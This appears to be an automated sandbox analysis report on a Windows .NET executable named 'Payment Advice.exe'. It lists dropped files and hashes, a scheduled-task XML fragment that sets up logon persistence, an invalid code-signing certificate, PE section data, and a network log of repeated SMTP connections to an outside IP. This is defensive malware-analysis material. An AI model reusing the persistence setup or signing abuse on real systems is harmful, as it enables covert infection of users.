                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1580
                                                                                    Entropy (8bit):5.130509900371807
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTeiv
                                                                                    MD5:FF8D8947E97C7AFA666C77CB83609FE4
                                                                                    SHA1:905DD78209DF5B8BDDDC77A1265B3AA5D03E655D
                                                                                    SHA-256:CE276398C675753C1B709070078CB68B7A333F67E263B8F444F55A09D8AC452F
                                                                                    SHA-512:CA38769C7FBAC37A586CEBFEB2451E756D0E8E2E20BB5775509D03877E927B95211A3282C5919C398B4F1E512CF39A8B008F8C669ED6227942C2713C06A0A569
                                                                                    Malicious:true
                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                    Process:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1580
                                                                                    Entropy (8bit):5.130509900371807
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTeiv
                                                                                    MD5:FF8D8947E97C7AFA666C77CB83609FE4
                                                                                    SHA1:905DD78209DF5B8BDDDC77A1265B3AA5D03E655D
                                                                                    SHA-256:CE276398C675753C1B709070078CB68B7A333F67E263B8F444F55A09D8AC452F
                                                                                    SHA-512:CA38769C7FBAC37A586CEBFEB2451E756D0E8E2E20BB5775509D03877E927B95211A3282C5919C398B4F1E512CF39A8B008F8C669ED6227942C2713C06A0A569
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                    Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1580
                                                                                    Entropy (8bit):5.130509900371807
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTeiv
                                                                                    MD5:FF8D8947E97C7AFA666C77CB83609FE4
                                                                                    SHA1:905DD78209DF5B8BDDDC77A1265B3AA5D03E655D
                                                                                    SHA-256:CE276398C675753C1B709070078CB68B7A333F67E263B8F444F55A09D8AC452F
                                                                                    SHA-512:CA38769C7FBAC37A586CEBFEB2451E756D0E8E2E20BB5775509D03877E927B95211A3282C5919C398B4F1E512CF39A8B008F8C669ED6227942C2713C06A0A569
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):695304
                                                                                    Entropy (8bit):7.966429011761553
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:fH7A3U2WtXkF/gAiCTLY10rcTu0Gm6NHeMdwG+q7Ln2oMIzw4CGDw92kR:UE2OSIUTE14cZ6dp3n2opw/
                                                                                    MD5:F060B9400A263BEA044A7789EC1D85D9
                                                                                    SHA1:3E939EA522E4356FBDC15C7E0119366A6369E0C9
                                                                                    SHA-256:921ACE6C0F27813FA370B65BCAEE79824A4E31920DBDFEC7652103C60E84CD23
                                                                                    SHA-512:CEDA146640E354440FFBDBE3B8DE48E4C1B7B03654687115B1E320F6C38513BFE00CC5BA5AFB5858126BC6A257630980D34FD81F26AE992077330ED30D3A39DA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:false
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.966429011761553
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Payment Advice.exe
                                                                                    File size:695'304 bytes
                                                                                    MD5:f060b9400a263bea044a7789ec1d85d9
                                                                                    SHA1:3e939ea522e4356fbdc15c7e0119366a6369e0c9
                                                                                    SHA256:921ace6c0f27813fa370b65bcaee79824a4e31920dbdfec7652103c60e84cd23
                                                                                    SHA512:ceda146640e354440ffbdbe3b8de48e4c1b7b03654687115b1e320f6c38513bfe00cc5ba5afb5858126bc6a257630980d34fd81f26ae992077330ed30d3a39da
                                                                                    SSDEEP:12288:fH7A3U2WtXkF/gAiCTLY10rcTu0Gm6NHeMdwG+q7Ln2oMIzw4CGDw92kR:UE2OSIUTE14cZ6dp3n2opw/
                                                                                    TLSH:94E423C5B2B4DB33C38D4D70A163860C2772D9C67611E7FE259A85BB2BF2B2055A0D63
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4O f.................B...".......a... ........@.. ....................................@................................
                                                                                    Icon Hash:0f235999b9792317
                                                                                    Entrypoint:0x4a61ce
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x66204F34 [Wed Apr 17 22:37:40 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                    Error Number:-2146869232
                                                                                    Not Before, Not After
                                                                                    • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                    Subject Chain
                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                    Version:3
                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa6178 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa8000 | 0x2000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa6600 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xaa000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa41d4 | 0xa4200 | 2d1243158acca84c0b10f453a17975c4 | False | 0.9725238599581112 | data | 7.9742405595701085 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa8000 | 0x2000 | 0x2000 | 6655e2f191b4c0728fc517c924389d02 | False | 0.8511962890625 | data | 7.305259548618807 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xaa000 | 0xc | 0x200 | a1f6ddafbf40ea4d07a583db73112350 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xa8100 | 0x1834 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9917688831504197
RT_GROUP_ICON | 0xa9944 | 0x14 | data | | | 1.05
RT_VERSION | 0xa9968 | 0x350 | data | | | 0.4386792452830189
RT_MANIFEST | 0xa9cc8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Apr 18, 2024 18:26:14.526901960 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:14.943511009 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:14.943564892 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:14.943602085 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:14.943634033 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.675188065 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.675273895 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.675350904 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.678853989 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.678889990 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.713589907 CEST5874974094.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.843029022 CEST49740587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:15.895162106 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.895433903 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.900213003 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:15.900253057 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:15.900465965 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:16.009212017 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:16.056128025 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:16.204720974 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:16.204761982 CEST44349742104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:16.204900980 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:16.216689110 CEST49742443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:16.774298906 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:17.251279116 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:17.251368999 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:17.751367092 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:17.751595974 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:18.204749107 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:18.204906940 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:18.687135935 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:18.687557936 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:19.138411045 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:19.138464928 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:19.138501883 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:19.138552904 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:19.140475988 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:19.554100037 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:19.562905073 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:20.035619020 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:20.036125898 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:20.471540928 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:20.471900940 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:20.906261921 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:20.906517029 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:21.359031916 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:21.360456944 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:21.819173098 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:21.819654942 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.244095087 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:22.244944096 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.245023012 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.245050907 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.245052099 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:22.665406942 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:22.665452003 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:22.665532112 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:22.665564060 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.474019051 CEST5874974794.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.514702082 CEST49747587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:23.707328081 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.707423925 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.707524061 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.710082054 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.710124016 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.934478045 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.934585094 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.939341068 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.939378023 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.940346003 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:23.983428955 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:23.984637976 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:24.032115936 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:24.249629974 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:24.249768972 CEST44349750104.26.13.205192.168.2.4
                                                                                    Apr 18, 2024 18:26:24.249898911 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:24.259754896 CEST49750443192.168.2.4104.26.13.205
                                                                                    Apr 18, 2024 18:26:24.670759916 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:25.070580959 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:25.070714951 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:25.561213017 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:25.561459064 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:25.960481882 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:25.960668087 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:26.370327950 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:26.370841980 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:26.800082922 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:26.800240993 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:26.800290108 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:26.800483942 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:26.802839041 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:27.185410023 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:27.195375919 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:27.532994986 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:27.533335924 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:27.877345085 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:27.877979040 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:28.243654013 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:28.244298935 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:28.626977921 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:28.627350092 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.043349981 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.044004917 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.433307886 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.434067965 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.434299946 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.434299946 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.434299946 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:26:29.832439899 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.832499027 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.832531929 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:29.832562923 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:30.640228987 CEST5874975194.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:26:30.702310085 CEST49751587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:27:31.922877073 CEST49738587192.168.2.494.100.26.91
